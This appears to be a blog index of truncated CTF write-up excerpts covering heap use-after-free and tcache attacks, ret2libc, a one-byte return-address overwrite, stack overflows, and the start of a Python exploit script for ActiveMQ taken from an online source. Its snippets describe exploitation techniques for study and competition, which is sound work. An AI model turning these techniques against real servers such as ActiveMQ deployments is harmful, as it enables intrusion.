nyyyddddn


nssr18_wp
Ugh, I'm so bad at this; I only solved one problem.

HappyCTF

public vuln
vuln proc near
buf= byte ptr -110h
var_8= qword ptr -8
; __unwind {
endbr64
push rbp
mov rbp, rsp
sub rsp, 110h
lea rax, aNowPlzYouInput ; "Now,plz you input:"
mov rdi, rax ; s
call ...
hgame2024week2_pwn_wp
pwn

Elden Ring Ⅱ
A heap-manager challenge on glibc 2.31, no PIE, with four functions: add, edit, show and delete. There is a UAF in delete.

void delete_note()
{
  unsigned int v0; // [rsp+Ch] [rbp-4h] BYREF

  printf("Index: ");
  __isoc99_scanf("%u", &v0);
  if ( v0 <= 0xF )
  {
    i...
0xl4ugh_pwn
pwn

pwn1
glibc 2.31 with PIE. Choice 10 can allocate a very large chunk, so the idea is to fill up tcache, then free a large chunk and leak the libc address through the unsorted bin, then use a tcache bin attack to write free_hook as system, and finally free a chunk whose contents are binsh to trigger system(/bin/sh).
...
hgame2024week1_wp
re

ezASM
From checkflag you can see that the cmp logic is an XOR with 0x22.

section .data
c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17,...
beginctf2024_wp
pwn

one_byte
You can overwrite exactly one byte of the return address. Looking at it, the return address is a libc address, 29dxx. I read through the assembly near 29dxx: there is no direct output function, nor any assembly that jumps to an output function. So the idea was to brute-force that one byte, record every byte value that produced output, and in the end I found that \x89 returns to the main function and printed out the next flag character.

.text:0000000000029D89 48 8B 44 24 08 mov rax, [rsp+98h+var_90]
.text:0000000000029D8E FF D0 ...
rw体验赛wp
Ugh, I'm so bad at this; I only solved two problems. The ghostscript one I debugged for ages and never got working.

Be-an-ActiveMq-Hacker
Searched around and got through with an exploit found online: https://blog.csdn.net/weixin_49125123/article/details/135577221

import io
import socket
import sys

def main(ip, port, xml):
    classname = "org.springframewor...
nssctfr16_wp
pwn

nc_pwnre
An XOR logic; after the XOR you get a base64 string, and submitting the decoded text drops you into a shell.

a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]
for i in a:
    print(chr(i ^ 0x10),...
春秋杯冬季赛wp
pwn
So bad at this; I only solved one pwn problem and couldn't do the heap one.

nmanager
You can leak the libc address with printf %s, then do ret2libc; n = 8 reaches rbp exactly.

unsigned __int64 __fastcall modify(__int64 a1)
{
  char buf[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  do ...
pwnable.tw
pwnable.tw (continuously updated)

start
Checking the protections and looking at each segment's permissions shows that the stack is executable.

lhj@lhj-virtual-machine:~/Desktop/pwntw/start$ checksec start
[*] '/home/lhj/Desktop/pwntw/start/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8...
uoftctf_pwn_wp
pwn

basic-overflow
There is a shell function; the stack overflow overwrites the return address with shell.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+0h] [rbp-40h] BYREF

  gets(v4, argv, envp);
  return 0;
}

int shell()
{
  return execve("/bin/sh", 0LL, 0LL);
}

exp
...
Please give me your guidance!